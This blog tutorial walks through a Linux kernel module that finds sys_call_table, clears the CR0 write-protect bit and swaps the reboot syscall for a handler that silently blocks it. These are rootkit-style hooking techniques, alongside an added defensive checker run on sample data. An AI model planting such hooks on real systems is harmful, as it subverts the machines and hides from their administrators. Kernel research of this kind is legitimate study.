How to Block Linux Reboots Using a Kernel Module

March 20, 2025

Ever wondered what it takes to intercept system calls at the kernel level? In this post, I'll walk you through a project that builds a kernel module that hooks Linux's reboot() syscall and silently blocks it. Why? For fun, learning, and security research.

Check out the complete project on GitHub

The Idea

The core concept is simple: hijack the Linux system call table, replace the reboot() entry with our own function, and stop reboots cold.

This involves:

  • Finding the system call table (sys_call_table)
  • Disabling write protection temporarily using CR0 manipulation
  • Hooking into __NR_reboot
  • Logging and blocking the call

Deep Dive Into the Code

Here's how to locate the system call table using kprobes:

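#include <linux/kprobes.h>

/* kallsyms_lookup_name() is not exported to modules on recent kernels,
 * so its address is taken from a kprobe registered on the symbol. */
typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);

static struct kprobe kp = {
  .symbol_name = "kallsyms_lookup_name"
};

unsigned long *get_system_call_table_address(void) {
  kallsyms_lookup_name_t kallsyms_lookup_name;
  if (register_kprobe(&kp) < 0)
    return NULL;  /* the symbol could not be probed */
  kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;
  unregister_kprobe(&kp);
  return (unsigned long *)kallsyms_lookup_name("sys_call_table");
}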

Then, disable write protection:

/* CR0 bit 16 (0x10000) is the Write Protect (WP) flag. */
#define disable_write_protection() my_write_cr0(read_cr0() & (~0x10000))
#define enable_write_protection() my_write_cr0(read_cr0() | (0x10000))

/* Writes the given value to CR0 with inline assembly. */
static void my_write_cr0(unsigned long value) {
  __asm__ volatile("mov %0, %%cr0" :: "r"(value) : "memory");
}

And finally, hijack the reboot syscall:

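/* Replacement handler placed in the __NR_reboot slot of the table. */
asmlinkage int hackers_reboot(int magic1, int magic2, int cmd, void *arg) {
  if (enable_reboot) {
      /* Pass the call through to the original handler. */
      return old_reboot_sys_call(magic1, magic2, cmd, arg);
  }
  printk(KERN_NOTICE "EHROOTKIT: Blocked reboot Call\n");
  /* Positive EPERM reaches user space as a plain return value;
   * the kernel's error convention would be -EPERM. */
  return EPERM;
}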
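
The defender's side of this hook, as an added example that is not part of the original post or its project: a handler address in the syscall table should lie inside core kernel text (between _stext and _etext), so a slot pointing into module space stands out. The kallsyms excerpt, the table snapshot and every address below are constructed sample data, 169 is __NR_reboot on x86_64, and how the snapshot is captured (for instance from a memory image) is left out.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample data: a /proc/kallsyms-style excerpt and a small
 * snapshot of syscall handler addresses. All addresses are made up. */
static const char *SAMPLE_KALLSYMS =
    "ffffffff81000000 T _stext\n"
    "ffffffff810c2a40 T __x64_sys_reboot\n"
    "ffffffff82000000 T _etext\n"
    "ffffffffc0a51000 t hackers_reboot\t[reboot_blocker]\n";

struct entry { int nr; unsigned long long addr; };

static const struct entry SAMPLE_TABLE[] = {
    { 0,   0xffffffff812f1a10ULL },  /* read: inside core kernel text */
    { 1,   0xffffffff812f1b30ULL },  /* write: inside core kernel text */
    { 169, 0xffffffffc0a51000ULL },  /* reboot: points into module space */
};

/* Look up a symbol's address in kallsyms-formatted text; 0 if absent. */
unsigned long long lookup_symbol(const char *kallsyms, const char *name) {
    const char *line = kallsyms;
    while (line && *line) {
        unsigned long long addr; char type, sym[128];
        if (sscanf(line, "%llx %c %127s", &addr, &type, sym) == 3 &&
            strcmp(sym, name) == 0)
            return addr;
        line = strchr(line, '\n');
        if (line) line++;
    }
    return 0;
}

/* Count handlers outside [_stext, _etext); -1 if the bounds are unknown. */
int count_hooked(const char *kallsyms, const struct entry *t, int n) {
    unsigned long long lo = lookup_symbol(kallsyms, "_stext");
    unsigned long long hi = lookup_symbol(kallsyms, "_etext");
    int hooked = 0;
    if (!lo || !hi)
        return -1;  /* symbols missing or zeroed (e.g. kptr_restrict) */
    for (int i = 0; i < n; i++)
        if (t[i].addr < lo || t[i].addr >= hi) {
            printf("syscall %d -> %#llx is outside kernel text\n",
                   t[i].nr, t[i].addr);
            hooked++;
        }
    return hooked;
}

int main(void) {
    return count_hooked(SAMPLE_KALLSYMS, SAMPLE_TABLE, 3) == 1 ? 0 : 1;
}
```
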

Testing the Module

make
sudo insmod reboot_blocker.ko

Try running reboot or shutdown now and... nothing. The module blocks it silently (and logs it to the kernel log).
To remove:

sudo rmmod reboot_blocker

Lessons Learned

  • Intercepting syscalls is a powerful (and dangerous) ability.
  • Linux kernel modules give you deep access to OS internals.
  • Even one-line mistakes in kernel space can crash the whole system

Stay curious. Stay ethical. Hack the planet.